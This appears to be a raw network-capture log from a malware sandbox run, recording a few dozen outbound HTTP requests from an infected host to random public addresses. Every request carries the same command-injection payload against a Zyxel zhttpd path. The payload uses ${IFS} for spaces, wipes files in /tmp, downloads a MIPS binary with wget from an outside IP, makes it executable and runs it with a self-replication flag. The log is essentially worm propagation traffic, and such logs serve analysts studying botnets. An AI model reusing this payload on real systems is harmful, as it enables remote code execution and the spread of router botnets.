                                              Jan 29, 2024 07:03:55.121762991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5767192.168.2.1459900204.254.95.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.121814013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5768192.168.2.145192659.2.13.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.121854067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5769192.168.2.1440484193.48.0.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.121871948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5770192.168.2.14537584.27.23.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114228010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5771192.168.2.1456472183.167.245.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114365101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5772192.168.2.145216885.240.171.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114409924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5773192.168.2.1434794157.61.184.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114434958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5774192.168.2.143867413.159.193.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114469051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5775192.168.2.144014284.139.50.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114510059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5776192.168.2.1449630209.250.52.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114622116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5777192.168.2.143749897.192.146.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114665985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5778192.168.2.1451144125.154.202.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114698887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5779192.168.2.145573270.97.138.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114734888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5780192.168.2.1442120213.102.70.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114787102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5781192.168.2.143678297.189.36.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114825964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5782192.168.2.144816261.140.172.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114867926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5783192.168.2.1442284173.36.36.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114907980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5784192.168.2.143732873.136.178.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114943981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5785192.168.2.144769887.193.131.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.114984989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5786192.168.2.1450784103.197.189.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115006924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5787192.168.2.143799452.117.28.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115065098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5788192.168.2.14414621.111.183.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115093946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5789192.168.2.144699698.76.224.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115140915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5790192.168.2.1442640199.71.135.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115169048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5791192.168.2.1441502198.50.147.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115212917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5792192.168.2.1453944223.89.196.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115232944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5793192.168.2.1440016130.161.92.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115289927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5794192.168.2.1452946179.225.202.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115314007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5795192.168.2.1435526158.28.123.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115344048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5796192.168.2.1447338175.224.116.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115384102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5797192.168.2.1439076102.42.182.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115403891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5798192.168.2.1445568210.128.27.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115446091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5799192.168.2.1446904162.72.215.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115498066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5800192.168.2.1433014180.248.247.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115547895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5801192.168.2.143449247.238.110.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115575075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5802192.168.2.1452846129.0.93.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115622997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5803192.168.2.146019096.214.131.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115674973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5804192.168.2.1450236221.216.216.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115714073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5805192.168.2.1447754143.141.66.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115755081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5806192.168.2.1438864134.40.221.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115794897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5807192.168.2.143313434.82.120.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115828037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5808192.168.2.1439472179.158.252.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115859985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5809192.168.2.14522869.55.187.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115911961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5810192.168.2.1449132153.38.130.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115950108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5811192.168.2.145370468.195.212.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.115997076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5812192.168.2.145880474.247.134.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116024971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5813192.168.2.1443196179.90.69.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116058111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5814192.168.2.143881060.45.77.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116103888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5815192.168.2.146065439.237.42.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116136074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5816192.168.2.144011061.48.49.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116173029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5817192.168.2.144308259.166.144.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116226912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5818192.168.2.1458046163.44.167.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116247892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5819192.168.2.144119623.176.9.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116292953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5820192.168.2.1440926212.194.173.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116343975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5821192.168.2.1438042110.133.102.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116373062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5822192.168.2.146051885.43.166.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116403103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5823192.168.2.1436474168.245.230.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116456032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5824192.168.2.1451702131.42.75.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116487980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5825192.168.2.1449720126.226.156.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116532087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5826192.168.2.1458990170.225.133.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116575956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5827192.168.2.143419295.213.164.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116615057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5828192.168.2.1457684176.73.1.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116657972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5829192.168.2.145241418.178.131.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:56.116688967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5830192.168.2.1435286189.141.229.55443
                                              TimestampBytes transferredDirectionData
